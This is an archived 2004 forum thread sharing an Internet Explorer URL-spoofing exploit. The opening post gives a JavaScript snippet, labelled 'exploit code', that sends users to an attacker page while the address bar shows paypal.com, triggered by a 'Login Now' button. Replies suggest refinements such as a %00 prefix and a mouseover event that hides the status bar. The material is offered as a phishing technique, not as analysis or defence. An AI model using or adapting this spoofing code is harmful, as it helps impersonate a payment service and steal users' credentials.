Forums: Ie Exploit, Url Obsfication - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Ie Exploit, Url Obsfication

#1 User is offline   Blake 

  • Former Commander In Chief
  • Icon
  • Group: Retired General
  • Posts: 7,316
  • Joined: 24-September 02

Posted 29 January 2004 - 07:48 AM

Submitted by Stoney


but if u send a link with a %01 in it ie doesnt put anything after the %01 in the address bar like
http://www.paypal.co...com/PayPal.html

im sending this to u because i cant post in the exploit section because im a new membor

Example:

<!-- exploit code -->

<script language="javascript">
function DestinationUrl() {
location.href=unescape('http://www.paypal.com%01@urpage.com.com/index.htm');
return (false);
}

</script>

<!-- end exploit code -->

<!-- exploit link -->

<input TYPE="button" VALUE=" Login Now" NAME="Destination" onclick="window.DestinationUrl()">
<!-- end exploit link -->
0

#2 Guest_sysadmin_*

  • Group: Guests

Posted 29 January 2004 - 07:57 AM

You only can see the original link - while loading - in the statusbar of IE.

Its funny. :P
0

#3 User is offline   Nick W 

  • Master Sergeant
  • Icon
  • Group: Members
  • Posts: 1,250
  • Joined: 12-August 03

Posted 29 January 2004 - 11:54 AM

This issue has already appeared on the board two times before. Both times It was mentioned that doing a %00 before the %01 is better, and an even better way of doing it cause the "status bar" when you hover over the link indicates you are going to the spoofed site.

Here's a post with the full information from a while back:
http://www.governmen...t=0&#entry40031

Oh, and Microsoft is addressing this issue very soon.
0

#4 User is offline   Stoney 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 47
  • Joined: 28-January 04

Posted 29 January 2004 - 06:00 PM

not if the links a button it doesnt show were its going and even if u wanted to use a link u could allways use a mouseover event to hide it and i think i remember reading microsoft isnt gona address the issue till the next services pack
0

#5 User is offline   Faceless Master 

  • Staff Sergeant
  • Icon
  • Group: Members
  • Posts: 259
  • Joined: 06-January 04

Posted 29 January 2004 - 11:20 PM

Here is another link on the form regarding this.
http://www.governmen...?showtopic=5878
Regards
~Faceless Master
0

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting